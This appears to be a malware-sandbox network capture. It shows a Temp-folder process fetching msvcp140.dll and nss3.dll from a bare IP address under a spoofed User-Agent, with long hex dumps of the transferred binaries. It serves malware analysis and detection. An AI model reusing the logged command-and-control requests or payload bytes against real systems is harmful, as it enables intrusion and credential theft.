                                                          2024-05-26 22:28:19 UTC16384INData Raw: 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 03 b9 59 17 b7 d1 89 f8 f7 e1 89 d1 c1 e9 0d 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 02 89 f8 c1 e8 05 b9 c5 5a 7c 0a f7 e1 89 d1 c1 e9 07 bb ff 00 00 00 89 c8 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c1 80 c9 30 ba 83 de 1b 43 89 f8 f7 e2 8b 06 8b 7d 08 88 4c 38 01 c1 ea 12 89 d0 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c2 80 ca 30 89 f1 8b 06 8b 75 08 88 14 06 8b 39 8d 47 07 89 01 83 c7 0d b9 cd cc cc cc 8b 75 ec 89 f0 f7 e1 89 d1 c1 e9 03 8d 04 09 8d 04 80 89 f3 29 c3 80 cb 30 89 c8 ba cd cc cc cc f7 e2 8b 45 08 88 1c 38 89 c3 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 7d 0c 8b 07 88 4c 18 05 b9 1f 85 eb 51 89 f0 f7 e1 89 d1 c1 e9 05 89 c8 ba
                                                          Data Ascii: )0LY)0LZ|!i(0C}L8!i(0u9Gu)0E8)0}LQ
                                                          2024-05-26 22:28:19 UTC16384INData Raw: 00 00 00 31 c9 8d 14 08 83 c2 0c f2 0f 10 42 f4 8b 5d f0 f2 0f 11 04 0b 8b 7a fc c7 42 fc 00 00 00 00 89 7c 0b 08 8b 1e 8b 7e 04 8d 3c 7f 8d 3c bb 83 c1 0c 39 fa 72 cd e9 81 00 00 00 8b 06 8d 0c 49 8d 0c 88 89 4d f0 31 d2 8d 1c 10 83 c3 0c f2 0f 10 43 f4 f2 0f 11 04 17 8b 4b fc c7 43 fc 00 00 00 00 89 4c 17 08 83 c2 0c 3b 5d f0 72 da 8b 46 04 85 c0 0f 8e 02 ff ff ff 8b 1e 8d 04 40 8d 04 83 89 45 f0 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 ec 52 01 00 83 c4 04 83 c3 0c 3b 5d f0 0f 83 d4 fe ff ff eb db 31 c0 40 89 45 ec e9 27 ff ff ff 8d 0c 49 8d 3c 88 89 c3 39 fb 73 20 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 b0 52 01 00 83 c4 04 83 c3 0c 39 fb 72 e2 8b 1e 53 e8 9e 52 01 00 83 c4 04 8b 45 f0 89 06 8b 45 ec 89 46 08 e9 8b fe ff ff 68 a7 fa 07
                                                          Data Ascii: 1B]zB|~<<9rIM1CKCL;]rF@ECCtPR;]1@E'I<9s CCtPR9rSREEFh
                                                          2024-05-26 22:28:19 UTC16384INData Raw: 1b 89 c8 e9 b3 fe ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 07 89 c8 e9 c2 fe ff ff ff 15 b0 bf 08 10 cc cc cc cc 55 89 e5 57 56 89 ce 8b 79 20 85 ff 74 28 f0 ff 4f 38 75 22 8b 4f 14 83 f9 10 73 5f c7 47 10 00 00 00 00 c7 47 14 0f 00 00 00 c6 07 00 57 e8 2d 13 01 00 83 c4 04 8b 7e 18 c7 46 18 00 00 00 00 85 ff 74 1c 8b 07 85 c0 74 0d 50 ff 15 04 be 08 10 c7 07 00 00 00 00 57 e8 03 13 01 00 83 c4 04 8b 46 08 85 c0 75 2f 8b 46 04 85 c0 74 09 50 e8 ec 12 01 00 83 c4 04 5e 5f 5d c3 8b 07 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 76 20 50 e8 cf 12 01 00 83 c4 04 eb 86 c7 05 f4 f8 08 10 1a 2b 08 10 cc b9 18 00 00 00 e8 0d 80 02 00 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 04 89 c8 eb cf ff 15 b0 bf 08 10 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 e4 f8
                                                          Data Ascii: H) sUWVy t(O8u"Os_GGW-~FttPWFu/FtP^_]v P+H) sUSWV
                                                          2024-05-26 22:28:19 UTC16384INData Raw: 00 00 c7 44 24 34 07 00 00 00 66 c7 44 24 20 00 00 57 e8 e1 37 06 00 83 c4 04 89 c6 83 f8 07 8b 5c 24 04 0f 87 4b 03 00 00 8d 44 24 20 89 70 10 89 f1 01 f1 51 57 50 e8 fe 37 06 00 83 c4 0c 66 c7 44 74 20 00 00 8b 44 24 30 8b 4c 24 34 89 ca 29 c2 83 fa 11 0f 82 fd 05 00 00 8d 50 11 89 54 24 30 83 f9 08 72 06 8b 4c 24 20 eb 04 8d 4c 24 20 0f b7 15 de 4d 08 10 66 89 54 41 20 0f 10 05 ce 4d 08 10 0f 11 44 41 10 0f 10 05 be 4d 08 10 0f 11 04 41 66 c7 44 41 22 00 00 bf 10 00 00 00 57 e8 60 3e 00 00 83 c4 04 89 c6 8b 45 0c f2 0f 10 40 20 f2 0f 11 06 f2 0f 10 40 28 f2 0f 11 46 08 83 7c 24 34 08 72 06 8b 44 24 20 eb 04 8d 44 24 20 57 56 6a 03 6a 00 50 53 ff 15 2c e3 08 10 89 c3 56 e8 9e d2 00 00 83 c4 04 8b 4c 24 34 83 f9 08 8b 7c 24 08 0f 83 b0 03 00 00 85 db 0f
                                                          Data Ascii: D$4fD$ W7\$KD$ pQWP7fDt D$0L$4)PT$0rL$ L$ MfTA MDAMAfDA"W`>E@ @(F|$4rD$ D$ WVjjPS,VL$4|$
                                                          2024-05-26 22:28:19 UTC16384INData Raw: 08 0f 86 cc 02 00 00 83 c3 0f 89 d8 83 e0 f0 89 44 24 1c c1 eb 04 c1 e3 05 8d 34 1f 83 c6 50 80 7f 3c 00 89 7c 24 10 89 5c 24 18 74 0a 83 7f 40 00 0f 84 29 06 00 00 8d 47 0c 89 44 24 20 50 ff 15 30 be 08 10 8b 16 85 d2 0f 84 38 01 00 00 83 7a 08 00 0f 84 2e 01 00 00 8b 4a 04 8b 74 8a 0c 85 f6 0f 84 eb 01 00 00 8b 5f 40 85 db 75 60 0f bc fe 89 cb c1 e3 05 09 fb 0f bb fe 8b 7c 24 10 8b 44 24 18 0f af 5c 07 58 8b 44 07 68 89 74 8a 0c 01 d0 01 c3 83 42 08 ff 85 db 0f 84 a2 05 00 00 8b 44 24 1c 01 47 2c ff 74 24 20 ff 15 b0 be 08 10 85 db 0f 84 93 05 00 00 8b 4c 24 60 31 e9 e8 51 e7 01 00 89 d8 8d 65 f4 5e 5f 5b 5d c3 89 4c 24 04 89 54 24 14 8b 0b 8b 7b 04 89 3c 24 0f a4 cf 17 89 c8 c1 e0 17 31 c8 8b 53 0c 33 3c 24 89 7c 24 08 8b 4b 08 89 0c 24 89 53 04 0f a4
                                                          Data Ascii: D$4P<|$\$t@)GD$ P08z.Jt_@u`|$D$\XDhtBD$G,t$ L$`1Qe^_[]L$T${<$1S3<$|$K$S
                                                          2024-05-26 22:28:19 UTC16384INData Raw: 58 e9 75 ff ff ff c7 44 24 3c 00 00 00 00 8b 5c 24 04 e9 a5 fe ff ff 31 d2 a8 10 0f 44 54 24 18 31 c9 39 f2 0f 97 c0 0f 82 e1 fe ff ff 88 c1 e9 d5 fe ff ff b0 01 e9 ec fd ff ff 8b 46 04 83 f8 01 0f 87 13 01 00 00 89 f2 8b 06 31 c9 85 c0 8b 74 24 1c 0f 84 39 04 00 00 8b 48 04 83 e1 fe 89 0a 89 d1 83 e1 fe 89 54 24 04 8b 50 04 83 e2 01 09 ca 89 50 04 8b 54 24 04 8b 52 04 83 e2 01 09 ca 89 50 04 8b 4c 24 04 80 49 04 01 83 60 04 01 89 c1 e9 fb 03 00 00 c7 44 24 28 00 00 00 00 e9 f9 fd ff ff 8d 74 24 54 89 f1 e8 37 0b fe ff 8b 1e e9 47 ff ff ff 83 e3 fe 89 58 04 89 d6 8b 1a 85 db 0f 84 fb 01 00 00 8b 43 04 83 e0 fe 89 06 89 f0 83 e0 fe 8b 4b 04 83 e1 01 09 c1 89 4b 04 8b 4e 04 89 c8 83 e0 fe 0f 84 c0 01 00 00 8b 10 83 e2 fe 83 e1 01 09 d1 89 4e 04 89 30 8b 4b
                                                          Data Ascii: XuD$<\$1DT$19F1t$9HT$PPT$RPL$I`D$(t$T7GXCKKNN0K
                                                          2024-05-26 22:28:19 UTC16384INData Raw: c1 72 d1 88 cb 8b 50 04 83 e2 fe eb cc 83 e3 fe 89 1a 89 d6 83 e6 fe 8b 18 8b 48 04 83 e1 01 09 f1 89 48 04 85 db 0f 84 8d 0a 00 00 80 63 04 fe 8b 74 24 14 39 16 75 07 89 06 e9 69 ff ff ff 83 e0 fe 8b 56 04 83 e2 01 8d 0c 02 89 4e 04 85 c0 0f 84 25 0a 00 00 8b 08 83 e1 fe 09 d1 89 4e 04 89 30 8b 4e 04 83 e1 01 8b 50 04 83 e2 fe 09 ca 89 50 04 80 4e 04 01 85 ff 0f 84 1f 0a 00 00 39 37 0f 84 a0 05 00 00 e9 e0 05 00 00 8b 4c 24 1c 8b 19 89 d9 ba 00 f0 ff ff 21 d1 8b 70 08 21 d6 31 d2 39 f1 0f 97 c2 b9 ff ff ff ff 0f 42 d1 85 d2 0f 85 59 05 00 00 e9 c0 05 00 00 89 c1 85 d2 0f 85 c2 fe ff ff 8b 54 24 04 c7 02 00 00 00 00 8b 4c 24 08 c7 44 b1 14 01 00 00 00 83 fb 01 0f 84 17 02 00 00 89 10 8b 54 24 20 8b 44 24 48 85 c0 0f 84 c2 09 00 00 80 60 04 fe 8b 4c 24 0c
                                                          Data Ascii: rPHHct$9uiVN%N0NPPN97L$!p!19BYT$L$DT$ D$H`L$


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          21192.168.2.54976265.109.242.594431436C:\Users\user\AppData\Local\Temp\katA304.tmp
                                                          TimestampBytes transferredDirectionData
                                                          2024-05-26 22:28:20 UTC174OUTGET /msvcp140.dll HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                          Host: 65.109.242.59
                                                          Cache-Control: no-cache
                                                          2024-05-26 22:28:21 UTC246INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 26 May 2024 22:28:21 GMT
                                                          Content-Type: application/octet-stream
                                                          Content-Length: 450024
                                                          Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                          Connection: close
                                                          ETag: "6315a9f4-6dde8"
                                                          Accept-Ranges: bytes
                                                          2024-05-26 22:28:21 UTC16138INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_
                                                          2024-05-26 22:28:21 UTC16384INData Raw: 68 00 72 00 00 00 68 00 75 00 2d 00 68 00 75 00 00 00 68 00 79 00 2d 00 61 00 6d 00 00 00 69 00 64 00 2d 00 69 00 64 00 00 00 69 00 73 00 2d 00 69 00 73 00 00 00 69 00 74 00 2d 00 63 00 68 00 00 00 69 00 74 00 2d 00 69 00 74 00 00 00 6a 00 61 00 2d 00 6a 00 70 00 00 00 6b 00 61 00 2d 00 67 00 65 00 00 00 6b 00 6b 00 2d 00 6b 00 7a 00 00 00 6b 00 6e 00 2d 00 69 00 6e 00 00 00 6b 00 6f 00 2d 00 6b 00 72 00 00 00 6b 00 6f 00 6b 00 2d 00 69 00 6e 00 00 00 00 00 6b 00 79 00 2d 00 6b 00 67 00 00 00 6c 00 74 00 2d 00 6c 00 74 00 00 00 6c 00 76 00 2d 00 6c 00 76 00 00 00 6d 00 69 00 2d 00 6e 00 7a 00 00 00 6d 00 6b 00 2d 00 6d 00 6b 00 00 00 6d 00 6c 00 2d 00 69 00 6e 00 00 00 6d 00 6e 00 2d 00 6d 00 6e 00 00 00 6d 00 72 00 2d 00 69 00 6e 00 00 00 6d 00 73 00 2d
                                                          Data Ascii: hrhu-huhy-amid-idis-isit-chit-itja-jpka-gekk-kzkn-inko-krkok-inky-kglt-ltlv-lvmi-nzmk-mkml-inmn-mnmr-inms-
                                                          2024-05-26 22:28:21 UTC16384INData Raw: 00 10 e8 7b 00 10 04 7c 00 10 00 00 00 00 d8 4c 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 f4 8a 00 10 00 00 00 00 01 00 00 00 04 00 00 00 44 8b 00 10 58 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 14 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 34 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 84 8b 00 10 98 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 34 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 74 8b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 58 4d 06 10 c8 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 d8 8b 00 10 ec 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 58 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 c8 8b 00 10 00
                                                          Data Ascii: {|L@DX}0}}M@4}0}}4M@tXM}0}}XM@
                                                          2024-05-26 22:28:21 UTC16384INData Raw: c0 89 45 f4 de ea d9 c9 d9 5d e8 d9 45 e8 d9 55 10 d9 ee da e9 df e0 f6 c4 44 7b 05 dd d8 d9 45 10 8d 45 ec 50 8d 45 f8 50 d9 5d ec e8 fc fa ff ff 59 59 3b f3 0f 8c aa fd ff ff eb 10 8d 4e 01 d9 1c b7 3b cb 7d 06 d9 ee d9 5c b7 04 5e 8b c7 5f 5b c9 c3 55 8b ec 51 56 33 f6 39 75 14 7e 37 d9 ee 57 8b 7d 10 d9 04 b7 d9 5d fc d9 45 fc dd e1 df e0 dd d9 f6 c4 44 7b 1a 51 d9 1c 24 ff 75 0c ff 75 08 e8 97 fc ff ff d9 ee 83 c4 0c 46 3b 75 14 7c d2 dd d8 5f 8b 45 08 5e c9 c3 55 8b ec 51 51 8b 4d 0c 85 c9 75 04 d9 ee c9 c3 8b 55 08 83 f9 01 0f 84 9d 00 00 00 d9 02 d9 5d fc d9 45 fc d9 ee dd e1 df e0 f6 c4 44 0f 8b 82 00 00 00 d9 42 04 d9 5d fc d9 45 fc dd e1 df e0 f6 c4 44 7b 6e 83 f9 02 74 5d d9 42 08 d9 5d fc d9 45 fc dd e2 df e0 dd da f6 c4 44 7b 49 d9 c2 d8 c1
                                                          Data Ascii: E]EUD{EEPEP]YY;N;}\^_[UQV39u~7W}]ED{Q$uuF;u|_E^UQQMuU]EDB]ED{nt]B]ED{I
                                                          2024-05-26 22:28:21 UTC16384INData Raw: f7 0f b7 06 66 3b c1 74 0e 66 3b c2 74 09 8b 45 08 33 db 8b 30 eb 43 03 f7 6a 04 5b 89 75 f8 66 83 3e 28 89 5d f4 75 32 8b de 03 df 68 07 01 00 00 0f b7 03 50 ff 15 ac 72 06 10 59 59 85 c0 75 e9 0f b7 03 83 f8 5f 74 e1 89 5d f8 8b 5d f4 83 f8 29 75 06 8b 75 f8 83 c6 02 8b 45 0c 85 c0 74 02 89 30 8b 45 08 5f 89 30 8b c3 5e 5b c9 c3 55 8b ec 83 ec 48 a1 c0 41 06 10 33 c5 89 45 fc 6b 4d 18 07 33 d2 8b 45 10 53 8b 5d 14 56 8b 75 0c 89 75 d0 89 45 b8 89 55 bc 89 55 c4 89 55 c0 89 4d cc 57 8b fa 83 f9 23 7e 06 6a 23 59 89 4d cc 6a 30 58 89 13 89 53 04 66 39 06 75 12 c7 45 c4 01 00 00 00 83 c6 02 66 39 06 74 f8 89 75 d0 0f b7 0e b8 b8 2d 00 10 89 4d c8 8b 4d cc c7 45 d4 16 00 00 00 8b 75 c8 66 39 30 8b 75 d0 74 0b 83 c0 02 83 6d d4 01 75 ec 8b c2 85 c0 74 26 3b
                                                          Data Ascii: f;tf;tE30Cj[uf>(]u2hPrYYu_t]])uuEt0E_0^[UHA3EkM3ES]VuuEUUUMW#~j#YMj0XSf9uEf9tu-MMEuf90utmut&;
                                                          2024-05-26 22:28:21 UTC16384INData Raw: cc cc cc cc cc cc 55 8b ec 6a ff 68 09 e7 03 10 64 a1 00 00 00 00 50 a1 c0 41 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 e8 79 7b 00 00 50 e8 71 d8 ff ff 59 8b 40 0c 8b 4d f4 64 89 0d 00 00 00 00 59 c9 c3 cc cc 55 8b ec 83 79 38 00 8b 45 08 75 03 83 c8 04 ff 75 0c 50 e8 28 00 00 00 5d c2 08 00 cc cc cc cc 55 8b ec 6a 00 ff 75 08 e8 13 00 00 00 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 83 ec 1c 83 e0 17 89 41 0c 8b 49 10 56 23 c8 74 43 80 7d 0c 00 75 42 f6 c1 04 74 07 be 78 54 00 10 eb 0f be 90 54 00 10 f6 c1 02 75 05 be a8 54 00 10 8d 45 f8 6a 01 50 e8 f7 13 00 00 59 59 50 56 8d 4d e4 e8 bc e2 ff ff 68 a4 1a 04 10 8d 45 e4 50 eb 09 5e c9 c2 08 00 6a 00 6a 00 e8 f0 93 02 00 cc 53 57 8b f9 83 7f 4c 00 75 04 33 db eb 24 56 e8
                                                          Data Ascii: UjhdPA3PEdy{PqY@MdYUy8EuuP(]Uju]UEAIV#tC}uBtxTTuTEjPYYPVMhEP^jjSWLu3$V
                                                          2024-05-26 22:28:21 UTC16384INData Raw: 83 c4 10 c6 04 1e 00 83 f8 10 72 0b 40 50 ff 37 e8 54 95 ff ff 59 59 89 37 8b c7 5f 5e 5b c9 c2 0c 00 e8 b3 be ff ff cc 55 8b ec 83 ec 0c 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d fc 3b c2 72 69 8b 43 14 8d 3c 11 57 8b cb 89 45 f4 e8 88 b1 ff ff 8b f0 8d 4e 01 51 e8 b2 94 ff ff 59 ff 75 18 89 7b 10 8d 4d 0c ff 75 14 8b 7d f4 89 45 f8 89 73 14 ff 75 10 ff 75 fc 83 ff 10 72 17 8b 33 56 50 e8 6b 03 00 00 8d 47 01 50 56 e8 d2 94 ff ff 59 59 eb 07 53 50 e8 56 03 00 00 8b 45 f8 5f 89 03 8b c3 5e 5b c9 c2 14 00 e8 25 be ff ff cc 55 8b ec 83 ec 10 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d f0 3b c2 0f 82 8f 00 00 00 8b 43 14 8d 3c 11 57 8b cb 89 45 fc e8 f6 b0 ff ff 8b f0 8d 4e 01 51 e8 20 94 ff ff 83 7d fc 10 59 0f be 4d 14 89
                                                          Data Ascii: r@P7TYY7_^[UUSVWK+M;riC<WENQYu{Mu}Esuur3VPkGPVYYSPVE_^[%UUSVWK+M;C<WENQ }YM
                                                          2024-05-26 22:28:21 UTC16384INData Raw: 4d d4 53 33 c0 03 04 cb 52 13 7c cb 04 56 57 50 e8 f1 02 02 00 5b 8b 5d 08 8b f9 8b 4d d4 8b 75 d8 89 54 cb 04 8b 55 e8 89 04 cb 83 e9 01 89 4d d4 79 cf 5f 5e 5b c9 c3 55 8b ec 51 56 8b 75 14 33 d2 85 f6 7e 5f 53 8b 5d 08 29 5d 10 57 8b fb 89 75 fc 8b 5d 10 8b 0c 3b 03 0f 8b 44 3b 04 13 47 04 03 ca 89 0f 8d 7f 08 83 d0 00 8b d0 89 57 fc 83 67 fc 00 83 ee 01 75 dc 0b c6 8b 5d 08 74 22 8b 4d fc 3b 4d 0c 7d 1a 01 14 cb 8b 54 cb 04 13 d6 33 f6 89 54 cb 04 8b c2 21 74 cb 04 41 0b c6 75 e1 5f 5b 5e c9 c3 55 8b ec 8b 55 08 56 8b 75 0c 83 c2 f8 8d 14 f2 8b 02 0b 42 04 75 0b 8d 52 f8 4e 8b 0a 0b 4a 04 74 f5 8b c6 5e 5d c3 55 8b ec 53 56 33 db 33 f6 39 5d 0c 7e 30 57 8b 7d 08 ff 75 14 ff 75 10 ff 74 f7 04 ff 34 f7 e8 73 03 02 00 03 c3 89 04 f7 83 d2 00 8b da 89 5c
                                                          Data Ascii: MS3R|VWP[]MuTUMy_^[UQVu3~_S])]Wu];D;GWgu]t"M;M}T3T!tAu_[^UUVuBuRNJt^]USV339]~0W}uut4s\
                                                          2024-05-26 22:28:21 UTC16384INData Raw: 89 75 fc 89 46 04 c7 06 7c 69 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 e8 65 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 56 8b f1 ff 76 0c c7 06 4c 68 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 56 8b f1 ff 76 0c c7 06 8c 66 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc 56 8b f1 c7 06 50 69 00 10 e8 e2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 c7 06 90 67 00 10 e8 c2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 ff 76 08 c7 06 7c 69 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10
                                                          Data Ascii: uF|ifrjFqY^UQEVuFefrjFqY^VvLhqY(R^VvfqY(R^VPiq(R^Vgq(R^Vv|iqY(R
                                                          2024-05-26 22:28:21 UTC16384INData Raw: 80 7f 04 00 75 07 8b cf e8 85 26 00 00 0f b7 47 06 50 ff b5 74 ff ff ff e8 9a a8 ff ff 59 59 83 f8 0a 73 3c 8a 80 2c 6a 00 10 8b 4d 8c 88 85 64 ff ff ff ff b5 64 ff ff ff e8 5f 18 ff ff 8b 4d d8 8d 45 d8 83 fb 10 72 02 8b c1 80 3c 30 7f 74 4c 8d 45 d8 83 fb 10 72 02 8b c1 fe 04 30 eb 3a 8d 45 d8 83 fb 10 72 03 8b 45 d8 80 3c 30 00 74 45 80 7f 04 00 0f b7 47 06 75 0b 8b cf e8 10 26 00 00 0f b7 47 06 66 3b 85 60 ff ff ff 75 27 6a 00 8d 4d d8 e8 04 18 ff ff 46 8b 5d ec 8b cf e8 24 11 00 00 ff 75 98 8b cf e8 de 72 00 00 84 c0 0f 84 4a ff ff ff 8b 5d 90 85 f6 74 13 83 7d ec 10 8d 45 d8 72 03 8b 45 d8 80 3c 30 00 7e 52 46 8a 45 a7 83 7d d4 10 8d 55 c0 72 03 8b 55 c0 84 c0 75 49 85 f6 74 5e 8a 0a 80 f9 7f 74 57 83 ee 01 74 11 83 7d ec 10 8d 45 d8 72 03 8b 45 d8
                                                          Data Ascii: u&GPtYYs<,jMdd_MEr<0tLEr0:ErE<0tEGu&Gf;`u'jMF]$urJ]t}ErE<0~RFE}UrUuIt^tWt}ErE


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          22192.168.2.54976365.109.242.594431436C:\Users\user\AppData\Local\Temp\katA304.tmp
                                                          TimestampBytes transferredDirectionData
                                                          2024-05-26 22:28:22 UTC170OUTGET /nss3.dll HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                          Host: 65.109.242.59
                                                          Cache-Control: no-cache
                                                          2024-05-26 22:28:23 UTC248INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 26 May 2024 22:28:22 GMT
                                                          Content-Type: application/octet-stream
                                                          Content-Length: 2046288
                                                          Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                          Connection: close
                                                          ETag: "6315a9f4-1f3950"
                                                          Accept-Ranges: bytes
                                                          2024-05-26 22:28:23 UTC16136INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00
                                                          Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@
                                                          2024-05-26 22:28:23 UTC16384INData Raw: 89 c2 69 f3 90 01 00 00 29 f0 83 e2 03 66 85 d2 0f 94 c2 66 85 ff 0f 95 c6 20 d6 66 85 c0 0f 94 c0 08 f0 0f b6 c0 8d 04 40 8b 55 f0 0f be 84 82 20 7c 1a 10 89 41 10 8a 41 1a fe c8 0f b6 c0 ba 06 00 00 00 0f 49 d0 88 51 1a e9 f7 fe ff ff 83 c2 e8 89 51 0c 8b 41 10 89 45 f0 8b 71 14 40 89 41 10 66 ff 41 1c 0f b7 41 18 a8 03 0f 94 c3 69 f8 29 5c 00 00 8d 97 1c 05 00 00 66 c1 ca 02 0f b7 d2 81 fa 8f 02 00 00 0f 93 c2 20 da 81 c7 10 05 00 00 66 c1 cf 04 0f b7 ff 81 ff a3 00 00 00 0f 92 c6 08 d6 0f b6 d6 8d 14 52 0f be 94 96 20 7c 1a 10 39 55 f0 7c 26 89 f7 c7 41 10 01 00 00 00 8d 56 01 89 51 14 83 fe 0b 7c 12 c7 41 14 00 00 00 00 40 66 89 41 18 66 c7 41 1c 00 00 8a 41 1a fe c0 31 d2 3c 07 0f b6 c0 0f 4d c2 88 41 1a e9 51 fe ff ff c7 41 14 0b 00 00 00 8b 51 18
                                                          Data Ascii: i)ff f@U |AAIQQAEq@AfAAi)\f fR |9U|&AVQ|A@fAfAA1<MAQAQ
                                                          2024-05-26 22:28:23 UTC16384INData Raw: 7f 06 00 74 69 31 db 8b 44 9f 14 be 48 01 1d 10 85 c0 74 02 8b 30 68 d3 fe 1b 10 56 e8 f7 5b 19 00 83 c4 08 85 c0 b8 79 64 1c 10 0f 45 c6 8b 4f 10 0f b6 0c 19 f6 c1 02 ba 98 dc 1c 10 be 48 01 1d 10 0f 44 d6 f6 c1 01 b9 b1 de 1c 10 0f 44 ce 50 52 51 68 7f a0 1b 10 8d 44 24 60 50 e8 d6 b7 06 00 83 c4 14 43 0f b7 47 06 39 c3 72 99 8b 44 24 60 8d 48 01 3b 4c 24 58 0f 83 b7 03 00 00 89 4c 24 60 8b 4c 24 54 c6 04 01 29 eb 25 8b 44 24 04 8b 4c 24 08 8b 44 81 10 0f be 08 8d 54 24 50 51 ff 70 20 68 2c e2 1c 10 52 e8 89 b7 06 00 83 c4 10 f6 44 24 64 07 0f 85 4b 03 00 00 8b 44 24 54 85 c0 74 21 8b 4c 24 60 c6 04 08 00 83 7c 24 5c 00 74 12 f6 44 24 65 04 75 0b 8d 4c 24 50 e8 d4 68 06 00 eb 04 8b 44 24 54 89 44 24 18 8b 45 08 8b 80 a0 00 00 00 83 e0 0c 83 f8 08 0f 85
                                                          Data Ascii: ti1DHt0hV[ydEOHDDPRQhD$`PCG9rD$`H;L$XL$`L$T)%D$L$DT$PQp h,RD$dKD$Tt!L$`|$\tD$euL$PhD$TD$E
